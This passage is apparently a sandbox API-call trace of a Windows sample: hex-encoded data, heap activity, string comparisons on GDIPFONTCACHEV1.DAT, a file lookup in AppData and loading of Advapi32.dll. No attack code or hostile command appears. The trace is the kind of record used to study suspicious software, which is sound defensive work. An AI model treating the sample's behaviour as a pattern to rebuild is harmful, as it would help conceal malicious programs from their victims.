xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0209.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0209.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0209.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0209.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0209.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0209.271] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0209.271] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.271] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0209.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0209.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0209.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0209.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0209.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0209.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0209.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0209.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0209.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0209.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0209.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0209.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GDIPFONTCACHEV1.DAT", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DIPFONTCACHEV1.DAT", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IPFONTCACHEV1.DAT", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PFONTCACHEV1.DAT", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FONTCACHEV1.DAT", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ONTCACHEV1.DAT", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTCACHEV1.DAT", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TCACHEV1.DAT", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CACHEV1.DAT", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ACHEV1.DAT", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHEV1.DAT", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HEV1.DAT", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EV1.DAT", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V1.DAT", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.DAT", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0209.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0209.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0209.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0209.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0209.273] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0209.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0209.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0209.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0209.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0209.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0209.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0209.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0209.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0209.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0209.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0209.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0209.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0209.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0209.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x28) returned 0x249f170 [0209.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0209.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GDIPFONTCACHEV1.DAT", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DIPFONTCACHEV1.DAT", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IPFONTCACHEV1.DAT", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PFONTCACHEV1.DAT", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FONTCACHEV1.DAT", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ONTCACHEV1.DAT", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTCACHEV1.DAT", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TCACHEV1.DAT", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CACHEV1.DAT", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ACHEV1.DAT", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHEV1.DAT", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HEV1.DAT", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EV1.DAT", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V1.DAT", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0209.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3a08 [0209.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0209.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a08 | out: hHeap=0x25c0000) returned 1 [0209.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0209.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0209.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0209.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0209.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0209.276] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0209.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0209.276] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0209.276] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0209.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0209.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0209.276] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0209.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0209.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0209.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0209.276] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0209.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0209.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0209.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0209.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0209.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0209.277] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0209.277] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.277] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0209.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0209.277] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0209.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0209.277] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0209.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0209.277] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0209.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0209.278] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/GDIPFONTCACHEV1.DAT", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66051ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x66051ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9791f220, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a918, dwReserved0=0x860530, dwReserved1=0x81d2, cFileName="GDIPFONTCACHEV1.DAT", cAlternateFileName="GDIPFO~1.DAT")) returned 0xaa5820 [0209.278] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0209.278] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0209.278] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0209.278] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0209.278] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0209.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0209.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0209.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0209.279] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0209.279] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.279] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0209.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0209.279] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0209.279] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0209.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0209.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0209.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0209.279] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0209.280] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0209.280] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0209.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0209.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0209.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0209.280] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0209.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0209.280] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0209.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0209.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0209.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0209.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0209.281] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0209.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0209.281] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0209.281] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0209.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0209.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0209.281] RtlAllocateHeap (HeapHandle=0x25c0000, 